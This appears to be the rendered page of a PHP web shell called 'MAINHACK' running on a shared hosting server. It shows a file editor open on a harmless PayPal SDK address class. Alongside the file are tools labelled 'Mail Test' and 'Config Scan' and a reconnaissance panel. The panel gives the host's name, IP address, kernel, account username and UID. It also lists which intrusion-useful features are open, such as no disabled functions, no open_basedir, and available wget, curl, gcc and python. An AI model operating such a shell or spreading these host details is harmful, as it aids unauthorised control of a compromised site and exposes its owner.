[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: OpenIdAddress.php
<?php namespace PayPal\Api; use PayPal\Common\PayPalModel; /** * Class OpenIdAddress * * End-User's preferred address. * * @package PayPal\Api * * @property string street_address * @property string locality * @property string region * @property string postal_code * @property string country */ class OpenIdAddress extends PayPalModel { /** * Full street address component, which may include house number, street name. * * @param string $street_address * @return self */ public function setStreetAddress($street_address) { $this->street_address = $street_address; return $this; } /** * Full street address component, which may include house number, street name. * * @return string */ public function getStreetAddress() { return $this->street_address; } /** * City or locality component. * * @param string $locality * @return self */ public function setLocality($locality) { $this->locality = $locality; return $this; } /** * City or locality component. * * @return string */ public function getLocality() { return $this->locality; } /** * State, province, prefecture or region component. * * @param string $region * @return self */ public function setRegion($region) { $this->region = $region; return $this; } /** * State, province, prefecture or region component. * * @return string */ public function getRegion() { return $this->region; } /** * Zip code or postal code component. * * @param string $postal_code * @return self */ public function setPostalCode($postal_code) { $this->postal_code = $postal_code; return $this; } /** * Zip code or postal code component. * * @return string */ public function getPostalCode() { return $this->postal_code; } /** * Country name component. * * @param string $country * @return self */ public function setCountry($country) { $this->country = $country; return $this; } /** * Country name component. * * @return string */ public function getCountry() { return $this->country; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285